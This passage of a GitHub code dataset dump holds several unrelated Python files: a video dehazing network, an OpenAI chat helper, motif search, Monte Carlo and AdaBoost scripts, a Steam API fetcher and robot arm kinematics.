+'.png')\n\n\ndriver.quit()","repo_name":"adrianturtoczki/lastweekinmusic","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9010028962","text":"from config import BOT_PRE_PROMPT, OPEN_AI_MODEL, OPEN_AI_TEMPERATURE, OPEN_AI_MAX_TOKENS\n\ndef openai_chat_completion(message_for_openai, message, openai):\n response = openai.ChatCompletion.create(\n model=OPEN_AI_MODEL,\n max_tokens=OPEN_AI_MAX_TOKENS,\n n=1,\n stop=None,\n temperature=OPEN_AI_TEMPERATURE,\n user=str(message.chat.id),\n messages=[\n {\"role\": \"system\", \"content\": BOT_PRE_PROMPT},\n {\"role\": \"user\", \"content\": message_for_openai},\n ]\n )\n return 
response['choices'][0]['message']['content']","repo_name":"petrutaraul/ema","sub_path":"openai_chat_completion.py","file_name":"openai_chat_completion.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34594029853","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport einops\n\nfrom .map_modules import ResidualBlocksWithInputConv\nfrom .map_stda import STDABlock\nfrom .map_utils import get_discrete_values, get_flow_from_grid, flow_warp_5d\n\nfrom mmcv.cnn import ConvModule\nfrom mmcv.runner import BaseModule, load_checkpoint\nfrom mmedit.models import builder\nfrom mmedit.models.common import PixelShufflePack\nfrom mmedit.models.registry import BACKBONES\nfrom mmedit.utils import get_root_logger\n\n\nclass PriorDecodeLayer(nn.Module):\n\n def __init__(self,\n channels,\n level,\n upsample=True,\n num_trans_bins=32,\n memory_enhance=True):\n super().__init__()\n self.level = level\n\n self.upsample = upsample\n if upsample:\n self.up = PixelShufflePack(channels, channels, 2, 3)\n scale_head = [\n ConvModule(channels, channels, 3, padding=1)\n for _ in range(2)]\n self.scale_head = nn.Sequential(*scale_head)\n\n self.num_trans_bins = num_trans_bins\n self.head_t = nn.Sequential(\n nn.Conv2d(channels, channels, 3, 1, 1), nn.LeakyReLU(negative_slope=0.1, inplace=True),\n nn.Conv2d(channels, num_trans_bins, 1, 1, 0))\n self.head_a = nn.Sequential(\n nn.AdaptiveAvgPool2d(1),\n nn.Conv2d(channels, channels, 1, 1, 0), nn.LeakyReLU(negative_slope=0.1, inplace=True),\n nn.Conv2d(channels, 1, 1, 1, 0), nn.Sigmoid())\n\n self.memory_enhance = memory_enhance\n\n def forward(self, feats):\n level = self.level\n #\n enc_skip = feats['spatial_p'][-1][level]\n if self.upsample:\n feat = enc_skip + self.up(feats['decode_p'][-1][level + 1])\n feat = self.scale_head(feat)\n else:\n feat = enc_skip\n feats['decode_p'][-1][level] = feat\n\n # MPG: estimate t and A\n logit_t = self.head_t(feat)\n prob_t = torch.softmax(logit_t, dim=1) # b, num_trans_bins, h, w\n b, d, h, w = prob_t.shape\n values = get_discrete_values(self.num_trans_bins, 0., 1.) 
\\\n .view(1, self.num_trans_bins, 1, 1).to(prob_t.device).repeat(b, 1, h, w)\n out_t = (prob_t * values).sum(dim=1, keepdim=True)\n out_a = self.head_a(feat)\n feats['stage_t'][level] = out_t\n feats['stage_a'][level] = out_a\n\n # MPG: memory enhance\n if self.memory_enhance:\n # prior token\n token_p = feat.unsqueeze(2) * prob_t.unsqueeze(1) # b, c, d, h, w\n token_p = token_p.mean(dim=(-2, -1)) # b, c, d\n feats['token_p'][-1][level] = token_p\n\n # retrieve memory\n mem_p = [x[level] for x in feats['token_p']]\n mem_p = torch.stack(mem_p, dim=1) # b, N, c, d\n b, N, c, d = mem_p.shape\n mem_p = mem_p.transpose(-2, -1).reshape(b, N * d, c).contiguous() # b, Nd, c\n # read memory & attention\n _, _, h, w = feat.shape\n q_p = feat.permute(0, 2, 3, 1).reshape(b, h * w, c).contiguous() # b, hw, c\n scale = c ** -0.5\n attn = (q_p @ mem_p.transpose(-2, -1)) * scale # b, hw, Nd\n attn = F.softmax(attn, dim=-1)\n en_p = attn @ mem_p # b, hw, c\n en_p = en_p.reshape(b, h, w, c).permute(0, 3, 1, 2).contiguous() # b, c, h, w\n feats['enhance_p'][-1][level] = en_p\n else:\n feats['enhance_p'][-1][level] = feat\n\n return feats\n\n\nclass SceneDecodeLayer(nn.Module):\n\n def __init__(self,\n channels,\n level,\n upsample=True,\n prior_guide=True,\n num_kv_frames=3,\n align_depth=1,\n num_heads=1,\n kernel_size=3):\n super().__init__()\n self.level = level\n\n self.upsample = upsample\n if upsample:\n self.up = PixelShufflePack(channels, channels, 2, 3)\n\n self.prior_guide = prior_guide\n if prior_guide:\n self.guide_conv = ResidualBlocksWithInputConv(channels * 2, channels, 2)\n\n if not isinstance(num_kv_frames, (list, tuple)):\n num_kv_frames = list(range(1, num_kv_frames + 1))\n else:\n num_kv_frames = sorted(num_kv_frames)\n self.num_kv_frames = num_kv_frames\n self.align_layer = STDABlock(\n channels, num_heads=num_heads,\n align_depth=align_depth, dw_ks=kernel_size)\n\n self.aggre_beta = nn.Parameter(torch.ones(1))\n self.aggre_conv = ResidualBlocksWithInputConv(channels * 2, channels, 2)\n\n self.head_j = nn.Sequential(\n nn.Conv2d(channels, channels, 3, 1, 1), nn.LeakyReLU(negative_slope=0.1, inplace=True),\n nn.Conv2d(channels, 3, 1, 1, 0))\n\n def forward(self, feats):\n level = self.level\n num_kv_frames = self.num_kv_frames\n #\n enc_skip = feats['spatial_j'][-1][level]\n if self.upsample:\n feat_j = enc_skip + self.up(feats['decode_j'][-1][level + 1])\n else:\n feat_j = enc_skip\n\n # MPG: prior guide\n if self.prior_guide:\n feat_p = feats['enhance_p'][-1][level]\n feat_j = self.guide_conv(torch.cat([feat_p, feat_j], dim=1))\n q_j = feat_j\n\n # MSR: multi-range\n # prepare features\n kv_j, kv_p = [], []\n nf = len(feats['decode_j']) - 1 # buffer frames: skip current timestep\n for step in range(1, max(num_kv_frames) + 1):\n kv_j.append(feats['decode_j'][max(nf - step, 0)][level] if nf > 0 else feat_j)\n kv_p.append(feats['enhance_p'][max(nf - step, 0)][level])\n # print(f\"num_kv_frames: {num_kv_frames}, nf: {nf}, step: {step}, frame: {max(nf - step, 0)}\")\n kv_j = torch.stack(kv_j, dim=1) # b, nr, c, h, w\n kv_p = torch.stack(kv_p, dim=1) # b, nr, c, h, w\n\n # multi-range alignment\n feats_jr, feats_pr = [], []\n grids = []\n for r, kv_frames in enumerate(num_kv_frames):\n # gradually refine flow\n if self.upsample:\n grid_r = feats['pos_j'][-1][level + 1][:, r]\n # print(f\"level: {level}, grid_r: {grid_r.shape}\")\n b, g, h, w, p = grid_r.shape\n assert p == 3, \"Should be 5-D input sample\"\n grid_r = einops.rearrange(grid_r, 'b g h w p -> (b g) p h w')\n # 'False' is more 
similar to generated ref points\n grid_r = F.interpolate(grid_r, scale_factor=2, mode='bilinear', align_corners=False)\n grid_r = einops.rearrange(grid_r, '(b g) p h w -> b g h w p', g=g)\n else:\n grid_r = None\n\n # align scene features\n kv_jr = kv_j[:, :kv_frames]\n feat_jr, grid_r, ref_r = self.align_layer(q_j, kv_jr, grid_r)\n feats_jr.append(feat_jr)\n grids.append(grid_r)\n\n # warp prior features\n b, g, h, w, p = grid_r.shape\n feat_pr = kv_p[:, :kv_frames]\n feat_pr = einops.rearrange(feat_pr, 'b nf (g c) h w -> (b g) c nf h w', g=g)\n _grid = einops.rearrange(grid_r, 'b g h w p -> (b g) h w p')\n flow = get_flow_from_grid(_grid, ref_r, d=kv_frames)\n feat_pr = flow_warp_5d(feat_pr, flow.unsqueeze(1))\n assert feat_pr.shape[2] == 1\n feats_pr.append(feat_pr.squeeze(2))\n feats['pos_j'][-1][level] = torch.stack(grids, dim=1)\n feats['ref_j'][-1][level] = ref_r\n\n # GMRA\n # prepare features\n feats_jr = torch.stack(feats_jr, dim=1)\n b, nr, c, h, w = feats_jr.shape\n scale = c ** -0.5\n\n # attn: j\n q_j = einops.rearrange(feat_j, 'b c h w -> (b h w) c').unsqueeze(1) # bhw 1 c\n k_j = einops.rearrange(feats_jr, 'b nr c h w -> (b h w) nr c') # bhw nr c\n attn_j = q_j @ k_j.transpose(-2, -1) * scale # bhw 1 nr\n # attn: p\n q_p = feats['enhance_p'][-1][level]\n q_p = einops.rearrange(q_p, 'b c h w -> (b h w) c').unsqueeze(1) # bhw 1 c\n k_p = torch.stack(feats_pr, dim=1)\n k_p = einops.rearrange(k_p, 'b nr c h w -> (b h w) nr c') # bhw nr c\n attn_p = q_p @ k_p.transpose(-2, -1) * scale # bhw 1 nr\n # attn\n attn = attn_j + self.aggre_beta * attn_p\n attn = F.softmax(attn, dim=-1)\n\n v = einops.rearrange(feats_jr, 'b nr c h w -> (b h w) nr c') # bhw nr c\n feat = attn @ v\n assert feat.shape[1] == 1\n feat = einops.rearrange(feat.squeeze(1), '(b h w) c -> b c h w', h=h, w=w)\n feat = self.aggre_conv(torch.cat([feat, feat_j], dim=1))\n feats[f'decode_j'][-1][level] = feat\n\n # estimate J\n out_j = self.head_j(feat)\n feats['stage_j'][level] = out_j\n\n return feats\n\n\n@BACKBONES.register_module()\nclass MAPNet(BaseModule):\n \"\"\"MAP-Net.\n\n MAP-Net in \"Video Dehazing via a Multi-Range Temporal Alignment Network with Physical Prior\".\n \"\"\"\n RGB_MEAN = [0.485, 0.456, 0.406]\n RGB_STD = [0.229, 0.224, 0.225]\n\n def __init__(self,\n backbone,\n neck,\n upsampler,\n channels=32,\n num_trans_bins=32,\n align_depths=(1, 1, 1, 1),\n num_kv_frames=(1, 2, 3),\n ):\n super().__init__()\n\n self.backbone = builder.build_component(backbone)\n self.neck = builder.build_component(neck)\n self.upsampler = builder.build_component(upsampler)\n\n num_stages = len(align_depths)\n self.num_stages = num_stages\n\n # mpg\n self.num_trans_bins = num_trans_bins\n\n # msr: assume num_kv_frames is consecutive\n self.num_kv_frames = num_kv_frames\n\n # align & aggregate\n assert channels % 32 == 0\n num_heads = [channels // 32 for _ in range(num_stages)]\n kernel_sizes = [9, 7, 5, 3]\n\n self.prior_decoder_layers = nn.ModuleList()\n self.scene_decoder_layers = nn.ModuleList()\n\n guided_levels = (2, 3) # memory consumption\n for s in range(num_stages):\n self.prior_decoder_layers.append(\n PriorDecodeLayer(\n channels, s,\n upsample=s < num_stages - 1, memory_enhance=s in guided_levels\n ))\n self.scene_decoder_layers.append(\n SceneDecodeLayer(\n channels, s,\n upsample=s < num_stages - 1, prior_guide=s in guided_levels,\n num_kv_frames=num_kv_frames, align_depth=align_depths[s],\n num_heads=num_heads[s], kernel_size=kernel_sizes[s]\n ))\n\n self.window_size = 32 # for padding\n rgb_mean = 
torch.Tensor(self.RGB_MEAN).reshape(1, 3, 1, 1)\n rgb_std = torch.Tensor(self.RGB_STD).reshape(1, 3, 1, 1)\n self.register_buffer('rgb_mean', rgb_mean)\n self.register_buffer('rgb_std', rgb_std)\n\n @property\n def with_neck(self):\n \"\"\"bool: whether the segmentor has neck\"\"\"\n return hasattr(self, 'neck') and self.neck is not None\n\n def check_image_size(self, img):\n # https://github.com/JingyunLiang/SwinIR/blob/5aa89a7b275eeddc75cd7806378c89d23f298c48/main_test_swinir.py#L66\n # https://github.com/ZhendongWang6/Uformer/issues/32\n _, _, h, w = img.size()\n window_size = self.window_size\n mod_pad_h = (window_size - h % window_size) % window_size\n mod_pad_w = (window_size - w % window_size) % window_size\n out = F.pad(img, (0, mod_pad_w, 0, mod_pad_h), 'reflect')\n return out\n\n def extract_feat(self, img):\n \"\"\"Extract features from images.\"\"\"\n x = self.backbone(img)\n if self.with_neck:\n x = self.neck(x)\n return x\n\n def split_feat(self, feats, feat):\n feat_p, feat_j = [], []\n for s in range(self.num_stages):\n c = feat[s].shape[1]\n split_size_or_sections = c // 2\n x = torch.split(feat[s], split_size_or_sections, dim=1)\n feat_p.append(x[0])\n feat_j.append(x[1])\n feats['spatial_p'].append(feat_p)\n feats['spatial_j'].append(feat_j)\n return feats\n\n def decode(self, feats):\n # init\n keys = ['decode_p', 'token_p', 'enhance_p',\n 'decode_j', 'pos_j', 'ref_j']\n for k in keys:\n feats[k].append([None] * self.num_stages)\n keys = ['stage_t', 'stage_a', 'stage_j']\n for k in keys:\n feats[k] = [None] * self.num_stages\n\n for s in range(self.num_stages - 1, -1, -1):\n feats = self.prior_decoder_layers[s](feats)\n feats = self.scene_decoder_layers[s](feats)\n\n return feats\n\n def forward(self, lqs):\n \"\"\"\n Forward function\n\n Args:\n lqs (Tensor): Input hazy sequence with shape (n, t, c, h, w).\n\n Returns:\n out (Tensor): Output haze-free sequence with shape (n, t, c, h, w).\n \"\"\"\n n, T, c, h, w = lqs.shape\n\n feats = {\n 'spatial_p': [], 'decode_p': [], 'token_p': [], 'enhance_p': [],\n 'spatial_j': [], 'decode_j': [], 'pos_j': [], 'ref_j': [],\n 'stage_j': [], 'stage_t': [], 'stage_a': []\n }\n\n out_js = []\n img_01s = []\n aux_js, aux_is = [], []\n\n for i in range(0, T):\n # print(f\"\\ntime: {i}\")\n img = self.check_image_size(lqs[:, i, :, :, :])\n img_01 = img * self.rgb_std + self.rgb_mean # to the range of [0., 1.]\n img_01s.append(img_01)\n\n # encode\n feat = self.extract_feat(img) # tuple of feats, (4s, 8s, 16s, ...)\n feats = self.split_feat(feats, feat)\n\n # decode\n feats = self.decode(feats)\n\n # get output\n feat_j = feats['decode_j'][-1][0]\n out = self.upsampler(feat_j)\n out = img_01 + out\n\n if self.training:\n assert h == out.shape[2] and w == out.shape[3]\n out_js.append(out[:, :, 0: h, 0: w].contiguous())\n\n # auxiliary output for the current timestep\n if self.training:\n aux_j, aux_i = [], []\n for s in range(self.num_stages):\n tmp_j = F.interpolate(feats['stage_j'][s], size=img.shape[2:], mode='bilinear')\n out_j = img_01 + tmp_j # residue\n tmp_t = F.interpolate(feats['stage_t'][s], size=img.shape[2:], mode='bilinear').clip(0, 1)\n tmp_a = feats['stage_a'][s]\n out_i = out_j * tmp_t + tmp_a * (1 - tmp_t)\n aux_j.append(out_j[:, :, 0: h, 0: w])\n aux_i.append(out_i[:, :, 0: h, 0: w])\n aux_js.append(aux_j)\n aux_is.append(aux_i)\n\n # memory management\n feats['spatial_j'].pop(0)\n feats['spatial_p'].pop(0)\n if len(feats['decode_j']) > max(self.num_kv_frames):\n feats['decode_j'].pop(0)\n feats['decode_p'].pop(0)\n 
feats['enhance_p'].pop(0)\n assert len(feats['decode_p']) == len(feats['decode_j'])\n if not self.training:\n feats['pos_j'].pop(0)\n feats['ref_j'].pop(0)\n\n out = dict(out=torch.stack(out_js, dim=1)) # output dict\n\n # auxiliary output for a sequence\n if self.training:\n pos, ref = [], [] # sampling locations\n for s in range(self.num_stages):\n pos.append(torch.stack([feats['pos_j'][i][s] for i in range(T)], dim=1))\n ref.append(torch.stack([feats['ref_j'][i][s] for i in range(T)], dim=1))\n out['pos'] = pos # b, T, nr, g, h, w, 3\n out['ref'] = ref # b, T, 1, h, w, 3\n if self.training:\n aux_j, aux_i = [], [] # Js, Is\n for s in range(self.num_stages):\n aux_j.append(torch.stack([aux_js[i][s] for i in range(T)], dim=1))\n aux_i.append(torch.stack([aux_is[i][s] for i in range(T)], dim=1))\n out['aux_j'] = aux_j\n out['aux_i'] = aux_i\n out['img_01'] = torch.stack(img_01s, dim=1)\n\n return out\n\n def init_weights(self, pretrained=None, strict=True):\n \"\"\"Init weights for models.\n\n Args:\n pretrained (str, optional): Path for pretrained weights. If given\n None, pretrained weights will not be loaded. Defaults: None.\n strict (boo, optional): Whether strictly load the pretrained model.\n Defaults to True.\n \"\"\"\n logger = get_root_logger()\n logger.info(f\"Init weights: {pretrained}\")\n if isinstance(pretrained, str):\n load_checkpoint(self, pretrained, strict=strict, logger=logger)\n elif self.backbone.init_cfg is not None:\n self.backbone.init_weights()\n elif pretrained is not None:\n raise TypeError(f'\"pretrained\" must be a str or None. '\n f'But received {type(pretrained)}.')\n","repo_name":"jiaqixuac/MAP-Net","sub_path":"mmedit/models/backbones/map_backbones/mapnet_net.py","file_name":"mapnet_net.py","file_ext":"py","file_size_in_byte":17263,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"21"} +{"seq_id":"2234109870","text":"from MotifGen import get_motifs\nfrom RandomMotifPicker import get_random_motifs\n\nimport sys\nimport os\n\nsys.path.append(os.path.abspath(\"../week3\"))\nfrom Profile import get_profile\nfrom Score import get_score\n\n\ndef randomized_motif_search(dna, k, t, runs=1):\n final_motifs = []\n final_motifs_score = k * t\n for times in range(runs):\n best_motifs = get_random_motifs(dna, k)\n best_score = get_score(dna=best_motifs)\n while True:\n profile = get_profile(dna=best_motifs, laplacian_pseudocount=1)\n next_motifs = get_motifs(profile, dna)\n next_motifs_score = get_score(dna=next_motifs)\n if next_motifs_score < best_score:\n best_score = next_motifs_score\n best_motifs = next_motifs\n else:\n break\n\n if best_score < final_motifs_score:\n final_motifs_score = best_score\n final_motifs = best_motifs\n\n return final_motifs, final_motifs_score\n\n\nif __name__ == \"__main__\":\n with open(\"dataset_161_5.txt\") as f:\n k, t = map(int, f.readline().strip().split())\n dna = [f.readline().strip() for _ in range(t)]\n best_motifs, best_score = randomized_motif_search(dna, k, t, 1000)\n with open(\"ex1output.txt\", \"w\") as output:\n output.write(\"\\n\".join(best_motifs))\n","repo_name":"hot9cups/uhh-stuff","sub_path":"Finding Hidden Messages in DNA (Bioinformatics I)/week4/RandomizedMotifSearch.py","file_name":"RandomizedMotifSearch.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17245614609","text":"from random import random,randrange\nfrom math import exp,pi\nfrom numpy import 
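# randomized_motif_search above is a local search, so each run only converges
# to a local optimum; the `runs` loop keeps the best score over many random
# restarts. The same restart pattern in isolation (a sketch; `local_search` is
# a hypothetical callable returning a (candidate, score) pair):
def random_restarts(local_search, runs=1000):
    best, best_score = None, float('inf')
    for _ in range(runs):
        candidate, score = local_search()
        if score < best_score:
            best, best_score = candidate, score
    return best, best_score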
ones\nimport matplotlib.pyplot as plt\nimport os \n\ndirectory_name = os.path.dirname(__file__) # find directory of current running python file\nos.chdir(directory_name) # change the working directory to the directory that includes the running file\n\nN = 1000\nT = [10.0, 40.0, 100.0, 400.0, 1200.0, 1600.0]\nfor t in T:\n steps = 250000\n\n # Create a 2D array to store the quantum numbers\n n = ones([N,3],int)\n\n # Main loop\n eplot = []\n E = 3*N*pi*pi/2\n for k in range(steps):\n\n # Choose the particle and the move\n i = randrange(N)\n j = randrange(3)\n if random()<0.5:\n dn = 1\n dE = (2*n[i,j]+1)*pi*pi/2\n else:\n dn = -1\n dE = (-2*n[i,j]+1)*pi*pi/2\n\n # Decide whether to accept the move\n if n[i,j]>1 or dn==1:\n if random() < exp(-dE/t):\n n[i,j] += dn\n E += dE\n\n eplot.append(E)\n\n # Make the graph\n plt.plot(eplot)\n plt.ylabel(\"Energy\")\n plt.xlabel(\"Step Number\")\n plt.savefig(\"Lab11Q1plot1.png\", dpi = 300, bbox_inches = \"tight\")\n\n # this next part is from Nico Grisouard\n\n # This calculates the energy of each particle, neglecting constant factors\n energy_n = n[:, 0]**2 + n[:, 1]**2 + n[:, 2]**2 # n[:, 0]**2 => every row from zeroth column\n\n # This calculates the frequency distribution and creates a plot\n plt.figure(2)\n plt.clf()\n hist_output = plt.hist(energy_n, 50)\n plt.xlabel()\n plt.ylabel()\n\n # This is the frequency distribution\n energy_frequency = hist_output[0]\n\n # This is what the x-axis of the plot should look like\n # if we plot the energy distribution as a function of n\n # the 2nd axis of hist_output contains the boundaries of the array.\n # Instead, we want their central value, below.\n energy_vals = 0.5*(hist_output[1][:-1] + hist_output[1][1:])\n n_vals = energy_vals**0.5\n\n # Create the desired plot\n plt.figure(3)\n plt.clf()\n plt.bar(n_vals, energy_frequency, width=0.1)\n plt.xlabel(r\"$n = \\sqrt{e_{n}}$\")\n plt.ylabel(\"Number of Particles\")\n plt.title(\"Energy Frequency Histogram | T = \" + str(int(t)))\n plt.savefig(\"Lab11Q1plot2_\" + str(int(t)) + \".png\", dpi = 300, bbox_inches = \"tight\")\n\nplt.show()\n\n","repo_name":"brendanhalliday/Computational-Physics","sub_path":"LABS/Lab11/mcsim.py","file_name":"mcsim.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18147232757","text":"import numpy as np\r\nfrom torch import fix\r\n\r\ndef adaboost(\r\n X: np.ndarray,\r\n y: np.ndarray,\r\n T: int):\r\n \"\"\"\r\n adaboost实现\r\n\r\n 参数:\r\n T (int): 次数\r\n 返回值:\r\n thetas (np.ndarray): 模型阈值\r\n alphas (np.ndarray): 模型权重\r\n signs (np.ndarray): 模型方向\r\n e_ins (np.ndarray): 模型训练误差\r\n idxs (np.ndarray): 模型选择维度\r\n u_sums (np.ndarray): 样本权重\r\n eps (np.ndarray): 加权错误\r\n \"\"\"\r\n thetas = np.zeros(T)\r\n alphas = np.zeros(T)\r\n signs = np.zeros(T)\r\n e_ins = np.zeros(T)\r\n idxs = np.zeros(T,dtype=np.int)\r\n u_sums = np.zeros(T)\r\n eps = np.zeros(T)\r\n\r\n fix_theta = np.sort(X, axis=0)\r\n fix_theta = (fix_theta[:-1] + fix_theta[1:])/2\r\n fix_theta = np.r_[fix_theta, fix_theta[-1].reshape(1, -1) * 1.1]\r\n u = np.ones((X.shape[0], 1))/X.shape[0]\r\n\r\n for i in range(T):\r\n u_sums[i] = np.sum(u)\r\n (thetas[i], signs[i], e_ins[i], u, alphas[i], idxs[i], eps[i]) = decision_stump(X, y, u, fix_theta)\r\n \r\n return thetas, alphas, signs, e_ins, idxs, u_sums, eps\r\n\r\ndef decision_stump(\r\n X: np.ndarray,\r\n y: np.ndarray,\r\n u: np.ndarray,\r\n thetas: np.ndarray\r\n ):\r\n \"\"\"\r\n 决策桩实现\r\n \"\"\"\r\n sign 
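# The simulation above is a standard Metropolis step: a move raising the energy
# by dE is accepted with probability exp(-dE / T), and downhill moves
# (dE <= 0) are always accepted because exp(-dE/T) >= 1 > random().
# Minimal sketch of the acceptance rule in isolation:
from math import exp
from random import random

def metropolis_accept(dE, T):
    return dE <= 0 or random() < exp(-dE / T)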
= 1 # 方向\r\n min_e_in = 1.0\r\n best_theta = 0\r\n u_sum = np.sum(u)\r\n idx = 0\r\n dim = X.shape[1]\r\n y = y.reshape((-1, 1))\r\n\r\n for theta in thetas:\r\n pos_pred = np.where(X > theta, 1, -1)\r\n neg_pred = np.where(X < theta, 1, -1)\r\n \r\n err_pos = np.sum((pos_pred != y) * u, axis=0)\r\n err_neg = np.sum((neg_pred != y) * u, axis=0)\r\n err_all = np.append(err_pos,err_neg)\r\n\r\n i = np.argmin(err_all)\r\n min_err = err_all[i]\r\n\r\n if min_e_in > min_err:\r\n min_e_in = min_err\r\n idx = i % dim\r\n sign = - np.sign(i - 1.5)\r\n best_theta = theta[idx]\r\n \r\n x = X[:, idx]\r\n pred = np.where(x > best_theta , sign * 1, sign * -1).reshape((-1,1))\r\n eps = np.sum((pred != y) * u) / u_sum\r\n t = np.sqrt((1 - eps) / eps)\r\n alpha = np.log(t)\r\n u = u * np.exp(-y * alpha * pred) # 优化u的求法 见技法11节\r\n return (best_theta, sign, min_e_in, u, alpha, idx, eps)\r\n\r\ndef predict(\r\n thetas: np.ndarray,\r\n signs: np.ndarray,\r\n idxs: np.ndarray,\r\n alphas: np.ndarray,\r\n X: np.ndarray,\r\n ):\r\n \"\"\"\r\n 计算G的误差\r\n\r\n 参数:\r\n thetas (np.ndarray): 阈值\r\n signs (np.ndarray): 方向\r\n idxs (np.ndarray): 选择的X维度\r\n alphas (np.ndarray): 假设权重\r\n \"\"\"\r\n\r\n X_choose = X[:, idxs]\r\n pred = signs * np.sign((X_choose - thetas))\r\n pred = np.sign(np.sum(pred * alphas, axis = 1))\r\n return pred\r\n\r\ndef compute_err(y_hat, y):\r\n return np.mean(y_hat!=y)","repo_name":"WArewh/college","sub_path":"ai/foundation_technique/hw6/adaboost_stump.py","file_name":"adaboost_stump.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72452308534","text":"# Ввод числа и пустой список для ответов\r\nn = int(input('Введите целое число: '))\r\nmultiple_list = []\r\n\r\n# Проверка кратности числе от 1 до n на 7\r\nfor i in range(n):\r\n if i % 7 == 0:\r\n multiple_list.append(i)\r\n\r\n# Вывод чисел\r\nprint(f'Числа, кратные 7 в диапазоне от 0 до {n}: {multiple_list}')","repo_name":"myataSD/DZ-Dlya-cursa-","sub_path":"Python Core/DZ3/multiple of seven — копия.py","file_name":"multiple of seven — копия.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19803468440","text":"import requests\nimport json\nfrom pathlib import Path\nfrom alive_progress import alive_it\n\n\ndef get_steam_package_data(packages: list, refresh_data=True):\n \"\"\" connects to steam packagedetails api and downloads data\n\n Arguments:\n packages(list): list of packageids to collect data for\n\n Returns:\n list(dict): a list of dictionaries of all the data collected\n \"\"\"\n data_path = Path(__file__).parent.parent.joinpath('data')\n base_url = \"https://store.steampowered.com/api/packagedetails/\"\n\n data = []\n\n if refresh_data:\n \n for package_id in alive_it(packages, title=\"Getting data\"):\n\n response = requests.get(base_url, params={\"packageids\": package_id})\n json_response = json.loads(response.text)\n # if we get a response, and the \"success\" == True\n if json_response and json_response[str(package_id)][\"success\"]:\n d = json_response[str(package_id)][\"data\"]\n d[\"package_id\"] = package_id\n data.append(d)\n else:\n data.append({\"package_id\": package_id})\n\n # writing to a file in case we want to look at the raw data from latest load\n with open(f\"{data_path}/package_data.json\", 'w') as f:\n f.write(json.dumps(data, indent=4))\n\n else:\n with open(f\"{data_path}/package_data.json\", 'r') 
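# In the AdaBoost code above, alpha = log(sqrt((1 - eps) / eps)), i.e. the
# usual 0.5 * ln((1 - eps) / eps); the final ensemble is the weighted vote
# H(x) = sign(sum_t alpha_t * h_t(x)), which is exactly what predict() stacks
# up. Tiny numeric check of the identity (a sketch, not library code):
import numpy as np

eps = 0.2
assert np.isclose(np.log(np.sqrt((1 - eps) / eps)),
                  0.5 * np.log((1 - eps) / eps))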
as f:\n data = json.load(f)\n\n return data\n\n","repo_name":"MazrimT/steam-api","sub_path":"src/helpers/steam.py","file_name":"steam.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28147262025","text":"import sympy as sp\nfrom sympy.physics.mechanics import dynamicsymbols, Point, ReferenceFrame\nfrom math import pi\nimport numpy as np\nfrom mpl_toolkits import mplot3d\nimport matplotlib.pyplot as plt\n\n\ndef plot_arm(ax, T_list):\n def plot_axis(ax, x, y, z, x_a, y_a, z_a):\n ax.quiver(x, y, z, x_a[0], x_a[1], x_a[2], length=1, color='r', normalize=False)\n ax.quiver(x, y, z, y_a[0], y_a[1], y_a[2], length=1, color='g', normalize=False)\n ax.quiver(x, y, z, z_a[0], z_a[1], z_a[2], length=1, color='b', normalize=False)\n\n plot_axis(ax, 0, 0, 0, [1, 0, 0], [0, 1, 0], [0, 0, 1])\n T = sp.eye(4)\n for T_tmp in T_list:\n T = T * T_tmp\n plot_axis(ax, T[0, 3], T[1, 3], T[2, 3], T[0:3, 0], T[0:3, 1], T[0:3, 2])\n\n\ndef forward(q):\n theta, a, d, alpha = dynamicsymbols(\"theta a d alpha\")\n\n T = sp.Matrix([[sp.cos(theta), -sp.sin(theta) * sp.cos(alpha), sp.sin(theta) * sp.sin(alpha), a * sp.cos(theta)],\n [sp.sin(theta), sp.cos(theta) * sp.cos(alpha), -sp.sin(alpha) * sp.cos(theta), a * sp.sin(theta)],\n [0, sp.sin(alpha), sp.cos(alpha), d], [0, 0, 0, 1]])\n\n T1 = T.subs({theta: 0, a: 2.5, d: 5.4 + q[0], alpha: -pi / 2})\n T2 = T.subs({theta: q[1], a: 0, d: 3.6, alpha: pi / 2})\n T3 = T.subs({theta: q[2], a: 6.9, d: 2, alpha: 0})\n T4 = T.subs({theta: q[3], a: 12.5, d: 0, alpha: 0})\n return [T1, T2, T3, T4]\n\n\ndef forward1(q):\n theta, a, d, alpha = dynamicsymbols(\"theta a d alpha\")\n\n T = sp.Matrix([[sp.cos(theta), -sp.sin(theta) * sp.cos(alpha), sp.sin(theta) * sp.sin(alpha), a * sp.cos(theta)],\n [sp.sin(theta), sp.cos(theta) * sp.cos(alpha), -sp.sin(alpha) * sp.cos(theta), a * sp.sin(theta)],\n [0, sp.sin(alpha), sp.cos(alpha), d], [0, 0, 0, 1]])\n\n T1 = T.subs({theta: 0, a: 2.5, d: 5.4 + q[0], alpha: pi / 2})\n T2 = T.subs({theta: q[1], a: 0, d: 3.6, alpha: pi / 2})\n T3 = T.subs({theta: q[2], a: 6.9, d: 2, alpha: 0})\n T4 = T.subs({theta: q[3], a: 12.5, d: 0, alpha: 0})\n return [T1, T2, T3, T4]\n\n\ndef Jacobian(T1, T2, T3, T4):\n T01 = T1\n T02 = T01 * T2\n T03 = T02 * T3\n T04 = T03 * T4\n\n z0 = np.array([0, 0, 1])\n o0 = np.array([0, 0, 0])\n\n z1 = np.array(T01[0:3, 2]).astype(np.float64).squeeze(-1)\n o1 = np.array(T01[0:3, 3]).astype(np.float64).squeeze(-1)\n\n z2 = np.array(T02[0:3, 2]).astype(np.float64).squeeze(-1)\n o2 = np.array(T02[0:3, 3]).astype(np.float64).squeeze(-1)\n\n 